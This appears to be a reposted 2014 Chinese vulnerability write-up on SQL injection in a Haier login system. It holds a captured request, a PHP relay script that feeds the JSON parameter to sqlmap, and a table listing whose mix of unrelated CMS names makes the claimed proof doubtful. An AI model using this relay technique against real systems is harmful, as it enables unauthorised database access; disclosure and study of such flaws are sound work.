海尔集团之14某非常重要系统很有姿势的SQL注射下载

来源：黑吧安全网　浏览：1127次　时间：2014-04-30

系统地址：http://evs.haier.net/easp/uiloader/login.html海尔电子核销系统

在登陆的时候，用单引号登陆，就报错了。

本来以为会很简单，用一般的post注入就搞定。

但是我还是太傻太天真，抓到包的那一刻我眼泪掉下来。

POST http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm HTTP/1.1

Accept: */*

Referer: http://evs.haier.net/easp/uiloader/login.html

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Host: evs.haier.net

Content-Length: 40

Proxy-Connection: Keep-Alive

Pragma: no-cache

Cookie: JSESSIONID=2kpTSFLPRmJ2Fn1CYrJlD1GJjhmpVG8knMRSyMzkLRDpFM40t6L2!-881110793; cctUserId=admin; cctLocale=zh



[{"userId":"admin","password":"123456"}]

传递出去的参数是这样的啊，[{"userId":"admin","password":"123456"}]，SQLmap和其他的工具根本就不认啊。但是这明显就是注入啊？

智能无奈，写一个中转php文件，大爱小学生。

<?php

if (empty($_GET['id'])){

echo "vip.php?id=z7ysbsbsb";

}else{

$id=$_GET['id'];

$post_data="[{\"userId\":\"$id\",\"password\":\"123456\"}]"; $url='http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm';

$ch = curl_init();

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_URL,$url);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);

ob_start();

curl_exec($ch);

$result = ob_get_contents() ;

ob_end_clean();

echo $result;

}

?>

这里get的ID来替换掉post里面的userid参数，来实现注入。

本地访问下看看。

恩，看样子是问题不大了。

这里由于是中转注射了，本地是win的环境和php，可能检测出来跟服务器有差别。

但是呢，数据是跑不掉的。

over。

漏洞证明：

一部分数据。

Database: public

[206 tables]

+-------------------------------+

| Coefficients                  |

| DEPARTAMENTOS                 |

| DUMMY                         |

| D_PR_CUSTAS                   |

| EMPLOYEE                      |

| EPIXEIRISI                    |

| Enseignant                    |

| EventRedirect                 |

| Event_Category                |

| FUNDGROUP                     |

| Film                          |

| Firma                         |

| Fusion                        |

| Fusion8                       |

| Gruppen                       |

| HISTORY                       |

| JamPass                       |

| LIBRARY_BRANCH                |

| LT_CUSTOM1                    |

| LT_DECISAO                    |

| LT_ENCERRAMENTO               |

| LT_EQUIPES                    |

| LT_OBJETO                     |

| LT_SERIE                      |

| Lieux                         |

| MSmerge_errorlineage          |

| PROYECTO                      |

| Parameter                     |

| Pays                          |

| PropColumnMap                 |

| QRTZ_BLOB_TRIGGERS            |

| QRTZ_CRON_TRIGGERS            |

| QRTZ_FIRED_TRIGGERS           |

| ROLE                          |

| SGA_XPLAN_TPL_V$SQL_PLAN_SALL |

| States                        |

| TBLREPORTS                    |

| TRABAJA_EN                    |

| Titres                        |

| WidgetDescriptions            |

| _wfspro_admin                 |

| a_admin                       |

| abstract                      |

| admin_user                    |

| adminlogin                    |

| adminpsw                      |

| admuserinfo                   |

| articulos                     |

| attrs                         |

| auteur                        |

| badspy                        |

| bayview                       |

| be_groups                     |

| binn_maillist                 |

| binn_menu_tlevel              |

| binn_pages                    |

| binn_vote_temps               |

| bkp_String                    |

| categorie                     |

| cdb_bbcodes                   |

| cdb_itempool                  |

| cdb_pms                       |

| cdb_pmsearchindex             |

| cdb_polls                     |

| child_configs                 |

| cmContentVersionDigitalAsset  |

| cmRole                        |

| cms_member                    |

| cms_users                     |

| connections                   |

| contador                      |

| dados_estudante               |

| dbstaff                       |

| directeur                     |

| dtb_mailmaga_template         |

| dtb_news                      |

| dtb_other_deliv               |

| dtb_products_class            |

| egresado                      |

| enregistrs                    |

| equipment_type_seq            |

| esame                         |

| estado                        |

| etudiants                     |

| ew_menu                       |

| extremes                      |

| f_classtype                   |

| feedback                      |

| files_config                  |

| forums                        |

| geo_Sea                       |

| glas                          |

| guava_theme_modules           |

| id                            |

| imageCategoryList             |

| individual                    |

| inscription                   |

| jos_core_acl_aro_groups       |

| jos_core_log_searches         |

| jos_menu_types                |

| jos_messages_cfg              |

| jos_preguntas                 |

| jos_session                   |

| jos_templates_menu            |

| jos_vm_manufacturer_category  |

| jos_vm_product_reviews        |

| kpro_adminlogs                |

| licenses                      |

| lists                         |

| located                       |

| locus_data                    |

| lost_pass                     |

| mac                           |

| manutencao                    |

| melodies                      |

| membres                       |

| mgbliuyan                     |

| mucRoomProp                   |

| mushroom_testset              |

| my_lake                       |

| mymps_certification           |

| mymps_corp                    |

| mymps_crons                   |

| mymps_navurl                  |

| mymps_news_img                |

| mymps_telephone               |

| nuke_autonews                 |

| nuke_banner                   |

| nuke_bbdisallow               |

| nuke_encyclopedia_text        |

| nuke_journal_comments         |

| nuke_stats_year               |

| oe                            |

| oil_bannerclient              |

| oil_bfsurveypro_34            |

| oil_biolmed_entity            |

| oil_biolmed_measurements      |

| oil_core_acl_aro_map          |

| oil_modules                   |

| oil_session                   |

| order                         |

| ordre                         |

| papers                        |

| passwd                        |

| pc                            |

| phpbb_config                  |

| platforms                     |

| post                          |

| principal                     |

| produits                      |

| pw_attachs                    |

| pw_config                     |

| pw_forums                     |

| pw_hack                       |

| radacct                       |

| rating_track                  |

| rcpt                          |

| register                      |

| registriert                   |

| reglement                     |

| rel_paper_topic               |

| request                       |

| rss_categories                |

| rss_read                      |

| service                       |

| setting                       |

| site_iwis                     |

| solicitacaosenha              |

| spip_documents_rubriques      |

| spip_syndic                   |

| spip_types_documents          |

| spt_datatype_info             |

| spt_provider_types            |

| ssb                           |

| sse_familia                   |

| store3                        |

| store4                        |

| sysmaps                       |

| tables_priv                   |

| tbl_admins                    |

| tbl_tech                      |

| tblblogtrackbacks             |

| tblproducts                   |

| tbuseraccount                 |

| themes                        |

| time_zone_transition_type     |

| transfers                     |

| turizmi_ge                    |

| un                            |

| userInfo                      |

| user_connection               |

| user_online_newyear           |

| user_pword                    |

| user_uploads_pictures         |

| userid                        |

| utilisateurs                  |

| valhalla                      |

| vars                          |

| vcd                           |

| vcd_Log                       |

| vendor_types                  |

| vendors                       |

| webcal_entry_ext_user         |

| webcal_entry_log              |

| x_world                       |

| zl_admin                      |

+-------------------------------+